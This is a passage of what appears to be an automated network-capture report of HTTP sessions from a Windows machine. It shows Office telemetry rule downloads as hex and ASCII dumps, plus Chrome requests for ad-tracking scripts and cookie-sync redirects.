                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091238Z-17db6f7c8cfvq8pt2ak3arkg6n000000042000000000by6q
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          83192.168.2.74983013.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 427
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 0a475807-001e-00a2-0116-1cd4d5000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091238Z-17db6f7c8cffhvbz3mt0ydz7x400000004dg000000003z2v
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          84192.168.2.74982913.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 472
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 1375d82d-b01e-0084-53a9-1cd736000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091238Z-17db6f7c8cf9wwz8ehu7c5p33g00000003b000000000ax7q
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          85192.168.2.74983213.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:38 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:38 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 486
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: b8f0ecbf-701e-005c-16e0-1abb94000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091238Z-17db6f7c8cf6qp7g7r97wxgbqc00000005f00000000073b3
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          86192.168.2.74983465.9.66.974432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC361OUTGET /lt/c/3825/lt.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: tags.crwdcntrl.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC564INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 63965
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 01:41:01 GMT
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 20 Aug 2024 17:49:20 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "2afd7a7856345176e1c9c378191ae043"
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 98997c223299d9efd138e7fb9a08a072.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA56-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: JlE5sKm1G28Ra9xeEv_v2xpmP5Z6-pD4P_L2m99SEGU4sgDu0XiSwg==
                                                                                                                                                                                                                                                                                                                                                                          Age: 27099
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC16384INData Raw: 76 61 72 20 6c 6f 74 61 6d 65 49 73 43 6f 6d 70 61 74 69 62 6c 65 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 72 65 74 75 72 6e 20 28 20 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 6b 65 79 73 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 70 6f 73 74 4d 65 73 73 61 67 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 28 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 2e 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 29 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 20 26 26 20 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 20 21 3d 3d 20 27
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: var lotameIsCompatible = function() { return ( typeof Object.keys !== 'undefined' && typeof window.postMessage !== 'undefined' && typeof XMLHttpRequest !== 'undefined' && typeof(new XMLHttpRequest().withCredentials) !== 'undefined' && typeof console !== '
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC16384INData Raw: 6c 74 33 38 32 35 5f 70 3d 5b 22 45 4d 41 49 4c 22 2c 22 45 45 22 2c 22 45 4d 41 49 4c 5f 53 48 41 32 35 36 22 5d 3b 20 66 75 6e 63 74 69 6f 6e 20 6c 74 33 38 32 35 5f 71 28 61 29 7b 61 3d 76 6f 69 64 20 30 3d 3d 3d 61 3f 7b 7d 3a 61 3b 74 68 69 73 2e 49 61 3d 6e 75 6c 6c 3b 74 68 69 73 2e 73 61 3d 21 31 3b 69 66 28 61 26 26 6c 74 33 38 32 35 5f 72 28 61 29 29 7b 76 61 72 20 62 3d 21 31 3b 61 26 26 6c 74 33 38 32 35 5f 72 28 61 29 3f 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 61 2e 69 64 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 3d 74 79 70 65 6f 66 20 61 2e 74 79 70 65 3f 6c 74 33 38 32 35 5f 2e 65 72 72 6f 72 28 22 69 64 20 6f 62 6a 65 63 74 20 6d 75 73 74 20 63 6f 6e 74 61 69 6e 20 62 6f 74 68 20 27 69 64 27 20 61 6e 64 20 27 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: lt3825_p=["EMAIL","EE","EMAIL_SHA256"]; function lt3825_q(a){a=void 0===a?{}:a;this.Ia=null;this.sa=!1;if(a&&lt3825_r(a)){var b=!1;a&&lt3825_r(a)?"undefined"===typeof a.id||"undefined"===typeof a.type?lt3825_.error("id object must contain both 'id' and 't
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC16384INData Raw: 7b 76 61 72 20 62 3d 6e 65 77 20 6c 74 33 38 32 35 5f 57 61 3b 22 62 6f 6f 6c 65 61 6e 22 21 3d 3d 74 79 70 65 6f 66 20 61 3f 6c 74 33 38 32 35 5f 2e 65 72 72 6f 72 28 22 73 68 6f 75 6c 64 50 65 72 66 6f 72 6d 41 75 64 69 65 6e 63 65 45 78 74 72 61 63 74 69 6f 6e 20 28 22 2b 61 2b 22 29 20 73 68 6f 75 6c 64 20 62 65 20 61 20 62 6f 6f 6c 65 61 6e 22 29 3a 62 2e 6b 62 3d 61 3b 72 65 74 75 72 6e 20 62 7d 66 75 6e 63 74 69 6f 6e 20 6c 74 33 38 32 35 5f 59 61 28 61 29 7b 76 61 72 20 62 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 2c 63 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3f 22 29 3b 2d 31 21 3d 3d 63 26 26 28 62 3d 62 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 63 29 29 3b 61 2e 6a 62 3d 62 3b 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {var b=new lt3825_Wa;"boolean"!==typeof a?lt3825_.error("shouldPerformAudienceExtraction ("+a+") should be a boolean"):b.kb=a;return b}function lt3825_Ya(a){var b=window.location.href,c=b.indexOf("?");-1!==c&&(b=b.substring(0,c));a.jb=b;return a}function
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC14813INData Raw: 61 3d 61 2e 72 65 70 6c 61 63 65 28 2f 3c 5c 2f 3f 5b 5e 3e 5d 2b 5c 2f 3f 3e 2f 67 69 2c 22 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 6e 7c 5c 74 7c 5c 72 2f 67 69 2c 22 20 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 73 7b 32 2c 7d 2f 67 2c 22 20 22 29 2e 72 65 70 6c 61 63 65 28 2f 5c 5b 71 75 6f 74 65 5c 5d 5b 5c 73 5c 53 5d 2a 5c 5b 5c 2f 71 75 6f 74 65 5c 5d 2f 67 69 2c 22 22 29 3b 74 72 79 7b 61 3d 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 61 29 7d 63 61 74 63 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 6c 74 33 38 32 35 5f 49 62 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 62 2e 4b 62 3f 6c 74 33 38 32 35 5f 4d 62 28 61 2c 62 29 3a 6c 74 33 38 32 35 5f 4e 62 28 61 2c 62 29 7d 20 66 75 6e 63 74 69 6f 6e 20 6c 74 33 38 32
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: a=a.replace(/<\/?[^>]+\/?>/gi,"").replace(/\n|\t|\r/gi," ").replace(/\s{2,}/g," ").replace(/\[quote\][\s\S]*\[\/quote\]/gi,"");try{a=decodeURIComponent(a)}catch(b){}return a}function lt3825_Ib(a,b){return b.Kb?lt3825_Mb(a,b):lt3825_Nb(a,b)} function lt382


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          87192.168.2.749842107.178.254.654432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC739OUTGET /api/sync?pid=5324&it=1&iv=bb223ec720efd1a5bfb42707226896385053ef0e7abb66ab4369801d74f64181791426b5417dce21&_=2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pippio.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: did=tFq1X5sQFdt_tbrT; didts=1728897158; nnls=; pxrc=CAA=
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC653INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                          cache-control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                          location: https://p.adsymptotic.com/d/px/?_pid=16257&_psign=5a9f251662be469b9732c38b03f11952&_redirect=https%3A%2F%2Fpippio.com%2Fapi%2Fsync%3Fpid%3D710202%26it%3D1%26iv%3D%24%7BUUID%7D&_rand=00655748
                                                                                                                                                                                                                                                                                                                                                                          p3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: pxrc=CIfBs7gGEgYI36wrEAA=; Path=/; Domain=pippio.com; Expires=Fri, 13 Dec 2024 09:12:39 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          88192.168.2.749841107.178.254.654432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC421OUTGET /api/sync?pid=5324&_=2 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: pippio.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: did=tFq1X5sQFdt_tbrT; didts=1728897158; nnls=; pxrc=CAA=
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC653INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                          cache-control: no-cache, no-store
                                                                                                                                                                                                                                                                                                                                                                          location: https://p.adsymptotic.com/d/px/?_pid=16257&_psign=5a9f251662be469b9732c38b03f11952&_redirect=https%3A%2F%2Fpippio.com%2Fapi%2Fsync%3Fpid%3D710202%26it%3D1%26iv%3D%24%7BUUID%7D&_rand=09132191
                                                                                                                                                                                                                                                                                                                                                                          p3p: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
                                                                                                                                                                                                                                                                                                                                                                          set-cookie: pxrc=CIfBs7gGEgYI36wrEAA=; Path=/; Domain=pippio.com; Expires=Fri, 13 Dec 2024 09:12:39 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                          timing-allow-origin: *
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 google
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          Connection: close


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          89192.168.2.7498383.33.220.1504432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:39 UTC706OUTGET /track/cmb/generic?ttd_pid=xksw9la&ttd_tpi=1&gdpr=0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: match.adsrvr.org
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: TDID=7d931d72-b6cd-40d8-9aaa-91033ac03d95; TDCPM=CAEYBSgCMgsI0p-yyuKOtj0QBTgB
